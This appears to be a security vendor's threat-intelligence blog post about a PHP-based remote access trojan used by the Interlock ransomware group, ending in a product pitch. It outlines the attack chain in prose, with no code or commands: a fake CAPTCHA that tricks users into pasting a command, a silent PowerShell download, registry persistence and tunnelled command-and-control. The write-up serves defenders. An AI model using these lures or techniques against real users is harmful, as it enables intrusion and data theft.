How Interlock Ransomware Gang’s New RAT Slips Through the Cracks

A recent investigation in the DFIR Report uncovered a new version of the Interlock Remote Access Trojan (RAT), used by the ransomware group known as Interlock or NodeSnake. This updated version is written in PHP instead of JavaScript or Node.js, making it stealthier and more evasive against security tools.

The infection starts when a user visits a website compromised by the attackers. The site appears normal but contains hidden code that displays a fake CAPTCHA. After clicking the prompt, the user is tricked into copying and pasting a Windows Run command.  

This command executes a PowerShell script that silently downloads and installs the PHP-based RAT. This new infection method, dubbed “FileFix,” disguises the command as a file path in File Explorer, avoiding the usual visual clues that something suspicious is happening.

Once installed, the RAT collects detailed information about the system, including running processes, installed services, hardware details, available drives, and whether the user has administrative access.  

All this data is sent back to the attacker in a structured format. To maintain access, the malware stores a hidden script in the Windows Registry that ensures it runs every time the system starts.

The RAT maintains contact with the attackers using Cloudflare Tunnel, a service that makes it harder to trace their location. It also includes fallback IP addresses in case the tunnel is blocked.  

From there, the attacker can issue commands to run programs, install new payloads, move across the victim’s network using Remote Desktop Protocol, or shut down the malware entirely. This campaign shows a high level of sophistication and ongoing development.  

Takeaway: Interlock is playing from the same playbook that’s made groups like Scattered Spider so dangerous: custom tooling paired with high-impact social engineering. And that combo is wrecking even the most hardened environments. This isn’t just about clever malware, it’s about how that malware gets in the door.  

Interlock’s using fake CAPTCHAs and clipboard tricks to walk users straight into infection. No exploit required, no phishing email even, just a hijacked website and a prompt that convinces someone to copy-paste their own compromise. That’s not a vulnerability in the OS, that’s a vulnerability in human trust.

We’ve seen this before. Scattered Spider perfected the art of voice phishing (vishing) to socially engineer help desks into resetting MFA. They’ve impersonated IT staff, spoofed internal numbers, and even spun up fake Okta login pages on the fly. All of it designed to bypass strong identity and access controls not with code, but with confidence.

Interlock’s new campaign feels like a scaled-down, automation-ready version of the same approach. They’re investing in custom payloads like a PHP-based RAT and pairing it with attack chains that rely on misdirection, not malware alone. That’s what keeps getting past layered defenses: not a zero-day, but a zero-blink moment where a human makes the wrong decision.  

The lesson? When you combine social engineering backed by modular, stealthy, purpose-built tooling, the attacker’s ROI shoots through the roof. This is the new ransomware playbook. It’s not just about breaking in, it’s about blending in, sticking around, and pulling the strings while no one’s looking.  

EPP/EDR/XDR do a fantastic job at catching the bulk of commodity threats, known malware, and noisy behavior. They’re essential. But ransomware operators aren’t playing by those rules anymore. They’re not tossing out generic payloads and hoping for the best. They’re crafting attacks designed to sidestep those exact defenses.  

Whether it’s abusing living off the land binaries, injecting through legitimate tools, or tricking users into launching the malware themselves, attackers are slipping through cracks that traditional detection logic just doesn’t catch. That’s the gap.  

There’s a missing layer between initial access and full-blown compromise. If defenders don’t fill that space with purpose-built anti-ransomware and anti-exfiltration tech, attackers will keep exploiting it. The stack’s not broken, but it’s incomplete.

Halcyon eliminates the business impact of ransomware. Modern enterprises rely on Halcyon to prevent ransomware attacks, eradicating cybercriminals’ ability to encrypt systems, steal data, and extort companies – talk to a Halcyon expert today to find out more, and check out our quarterly RaaS and extortion group reference guide, Power Rankings: Ransomware Malicious Quartile.